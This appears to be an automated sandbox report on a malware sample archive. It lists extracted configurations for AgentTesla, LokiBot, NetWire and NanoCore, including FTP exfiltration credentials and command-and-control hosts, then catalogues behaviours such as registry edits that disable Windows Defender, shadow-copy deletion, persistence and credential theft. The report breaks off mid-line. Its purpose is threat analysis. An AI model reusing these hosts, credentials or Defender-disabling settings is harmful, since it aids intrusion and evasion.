Analysis
-
max time kernel
1199s -
max time network
1203s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
19-11-2024 18:56
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.04.7z
Resource
win11-20241007-en
General
-
Target
https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.04.7z
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.winsfgt.com/ - Port:
21 - Username:
[email protected] - Password:
231Father@
Protocol: ftp- Host:
ftp://ftp.winsfgt.com/ - Port:
21 - Username:
[email protected] - Password:
231Father@
Extracted
lokibot
http://107.175.150.73/~giftioz/.sama/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Extracted
netwire
185.103.96.151:3393
-
activex_autorun
false
-
copy_executable
false
-
delete_original
false
-
host_id
185.103.96.151
-
keylogger_dir
%AppData%\Logs\
-
lock_executable
false
-
offline_keylogger
true
-
password
Password
-
registry_autorun
true
-
startup_name
NetWire
-
use_mutex
false
Extracted
nanocore
1.2.2.0
185.103.96.151:3012
127.0.0.1:3012
593632ea-21be-48a1-af3e-d08cdcee3916
-
activate_away_mode
true
-
backup_connection_host
127.0.0.1
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2019-10-20T13:40:50.725270136Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
3012
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
593632ea-21be-48a1-af3e-d08cdcee3916
-
mutex_timeout
5000
-
prevent_system_sleep
true
-
primary_connection_host
185.103.96.151
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Glupteba family
-
Glupteba payload 28 IoCs
Processes:
resource yara_rule behavioral1/memory/4444-4382-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/4444-4385-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/4444-4384-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/4444-4386-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/4444-4383-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/4444-4381-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/4444-4380-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/4444-4390-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/1512-4402-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/1512-4401-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/1512-4400-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/1512-4403-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/1512-4404-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/1512-4407-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-4420-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-4419-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-4423-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-4422-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-4421-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-4424-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-4425-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-4427-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-4428-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-4430-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-4431-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-4436-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-4446-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba behavioral1/memory/3964-10358-0x0000000000400000-0x0000000000B27000-memory.dmp family_glupteba -
Hawkeye family
-
Lokibot family
-
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Nanocore family
-
NetWire RAT payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/4952-4458-0x0000000000400000-0x000000000042B000-memory.dmp netwire behavioral1/memory/4952-4459-0x0000000000400000-0x000000000042B000-memory.dmp netwire behavioral1/memory/4952-4461-0x0000000000400000-0x000000000042B000-memory.dmp netwire -
Netwire family
-
Parallax family
-
ParallaxRat payload 5 IoCs
Detects payload of Parallax Rat, a small portable Rat usually digitally signed with a Sectigo certificate.
Processes:
resource yara_rule behavioral1/memory/5008-4355-0x0000000000400000-0x0000000000BBE000-memory.dmp parallax_rat behavioral1/memory/5008-4359-0x0000000000400000-0x0000000000BBE000-memory.dmp parallax_rat behavioral1/memory/1312-4362-0x0000000000400000-0x0000000000BBE000-memory.dmp parallax_rat behavioral1/memory/1312-4366-0x0000000000400000-0x0000000000BBE000-memory.dmp parallax_rat behavioral1/memory/4416-4367-0x00000000005D0000-0x0000000000CCE000-memory.dmp parallax_rat -
Qakbot family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/804-3083-0x0000000000400000-0x000000000042A000-memory.dmp family_redline -
Redline family
-
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
Processes:
taskmgr.exedescription pid process target process PID 5984 created 5020 5984 taskmgr.exe Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe PID 5984 created 5020 5984 taskmgr.exe Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe PID 5984 created 6340 5984 taskmgr.exe Trojan-Ransom.Win32.Loo.c-924cc338d5d03f8914fe54f184596415563c4172679a950245ac94c80c023c7d.exe PID 5984 created 6340 5984 taskmgr.exe Trojan-Ransom.Win32.Loo.c-924cc338d5d03f8914fe54f184596415563c4172679a950245ac94c80c023c7d.exe -
AgentTesla payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2692-4183-0x0000000000400000-0x000000000044E000-memory.dmp family_agenttesla -
Contacts a large (65351) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
Trojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Trojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exe -
Renames multiple (971) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops file in Drivers directory 1 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 3708 netsh.exe 1820 netsh.exe -
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 4584 attrib.exe 5020 attrib.exe 3004 attrib.exe 1956 attrib.exe 5000 attrib.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Trojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Trojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Trojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exe -
Drops startup file 9 IoCs
Processes:
DllHost.exetaskmgr.exeBackdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exeTrojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exeTrojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.exe DllHost.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\genvalobj.url taskmgr.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\desktop.ini.ahegao taskmgr.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\licensingdiag.url Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\document.exe DllHost.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\licensingdiag.url taskmgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.ahegao Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GenValObj.url Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\document.exe DllHost.exe -
Executes dropped EXE 64 IoCs
Processes:
HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.exeHEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmpProtonVPN.exedllhost.exesvhost.exeHEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exeHEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exeProtonVPN.exeProtonVPNTap.exeHEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exeHEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exeProtonVPN.exeBackdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exeBackdoor.Win32.Xaparo.fg-1e04c1e4eefe23f454553364e757209462f2561d8455628b296b1dbe83fc6ec2.exeSearchIndexer.exeTrojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exeUDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exeUDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exeUDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exeUDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.execsrss.execsrss.exepatch.exeTrojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exeBackdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exeTrojan-Spy.Win32.KeyLogger.brcj-85267066f82927ee6ed25de08fbd0a697ece1331542db9158d7baf69fa874655.exemscongg.exemscongg.exeTrojan-Spy.Win32.Windigo.z-46ee7aa3a8e37caeafb8716ef015b48f5c319336e16c4772b7ddd50bd4e56bdf.exeTrojan.Win32.Reconyc.jmjd-044d234d96ba4d2c8d6b75dce9f3b778137708ed2fd39edfab8711d3431f8763.exectfmon.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exexsfxdel~.exeHEUR-Backdoor.Win32.Xaparo.gen-32b193b31a207856caddeac610618ff05855cf72fb737dd80f78726884f4a8ec.exeHEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exesvchost.exesvchost.exewget.exetaskhost.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeMBSetup.exeBackdoor.Win32.Xaparo.jl-4723ab5ed01fb642eb602ff59309d4d698e6011145ca1b757bb223b5a67fe159.exeTrojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exeTrojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exeTrojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exeTrojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exeHEUR-Trojan.Win32.Zenpak.vho-67f5f5877302d6bc59d848551fb22b8e2ed67fe08eec0d049849c1fae4f04819.exepid process 5020 HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.exe 1944 HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmp 2800 ProtonVPN.exe 3376 dllhost.exe 804 svhost.exe 1080 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2416 ProtonVPN.exe 3824 ProtonVPNTap.exe 1096 HEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exe 2692 HEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exe 3464 ProtonVPN.exe 4608 Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe 5008 Backdoor.Win32.Xaparo.fg-1e04c1e4eefe23f454553364e757209462f2561d8455628b296b1dbe83fc6ec2.exe 1312 SearchIndexer.exe 4416 Trojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exe 780 UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe 4444 UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe 2464 UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe 1512 UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe 2904 csrss.exe 3964 csrss.exe 728 patch.exe 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 4428 Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe 1148 Trojan-Spy.Win32.KeyLogger.brcj-85267066f82927ee6ed25de08fbd0a697ece1331542db9158d7baf69fa874655.exe 1940 mscongg.exe 4952 mscongg.exe 2340 Trojan-Spy.Win32.Windigo.z-46ee7aa3a8e37caeafb8716ef015b48f5c319336e16c4772b7ddd50bd4e56bdf.exe 248 Trojan.Win32.Reconyc.jmjd-044d234d96ba4d2c8d6b75dce9f3b778137708ed2fd39edfab8711d3431f8763.exe 2912 ctfmon.exe 472 svchost.exe 1964 svchost.exe 1368 svchost.exe 492 svchost.exe 804 svchost.exe 1136 xsfxdel~.exe 132 HEUR-Backdoor.Win32.Xaparo.gen-32b193b31a207856caddeac610618ff05855cf72fb737dd80f78726884f4a8ec.exe 4832 HEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exe 2296 svchost.exe 3552 svchost.exe 4960 wget.exe 2872 taskhost.exe 6060 Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe 6020 Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp 5300 7z.exe 5536 7z.exe 3288 7z.exe 5304 7z.exe 2016 7z.exe 1976 7z.exe 1936 7z.exe 2332 7z.exe 5304 7z.exe 3936 7z.exe 5296 7z.exe 3004 7z.exe 5732 MBSetup.exe 7020 Backdoor.Win32.Xaparo.jl-4723ab5ed01fb642eb602ff59309d4d698e6011145ca1b757bb223b5a67fe159.exe 5792 Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe 716 Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe 6952 Trojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exe 2036 Trojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exe 2004 HEUR-Trojan.Win32.Zenpak.vho-67f5f5877302d6bc59d848551fb22b8e2ed67fe08eec0d049849c1fae4f04819.exe -
Loads dropped DLL 64 IoCs
Processes:
ProtonVPN.exeMsiExec.exeHEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exeProtonVPN.exeProtonVPNTap.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exe7z.exe7z.exe7z.exe7z.exepid process 2800 ProtonVPN.exe 2800 ProtonVPN.exe 1960 MsiExec.exe 1960 MsiExec.exe 1960 MsiExec.exe 1960 MsiExec.exe 1960 MsiExec.exe 1960 MsiExec.exe 1960 MsiExec.exe 1960 MsiExec.exe 1960 MsiExec.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 2392 HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe 1960 MsiExec.exe 1960 MsiExec.exe 2416 ProtonVPN.exe 2800 ProtonVPN.exe 3824 ProtonVPNTap.exe 3824 ProtonVPNTap.exe 72 MsiExec.exe 3840 MsiExec.exe 3840 MsiExec.exe 3840 MsiExec.exe 3840 MsiExec.exe 3840 MsiExec.exe 3840 MsiExec.exe 3824 ProtonVPNTap.exe 3128 MsiExec.exe 3128 MsiExec.exe 3128 MsiExec.exe 3128 MsiExec.exe 3128 MsiExec.exe 3128 MsiExec.exe 3128 MsiExec.exe 3128 MsiExec.exe 3128 MsiExec.exe 3128 MsiExec.exe 3128 MsiExec.exe 3128 MsiExec.exe 3944 MsiExec.exe 3128 MsiExec.exe 3944 MsiExec.exe 5300 7z.exe 5536 7z.exe 3288 7z.exe 5304 7z.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/4416-4370-0x00000000005D0000-0x0000000000CCE000-memory.dmp themida behavioral1/memory/4416-4388-0x00000000005D0000-0x0000000000CCE000-memory.dmp themida -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
vbc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts vbc.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exeHEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe Key opened \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exe Key opened \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exe Key opened \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exe Key opened \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe Key opened 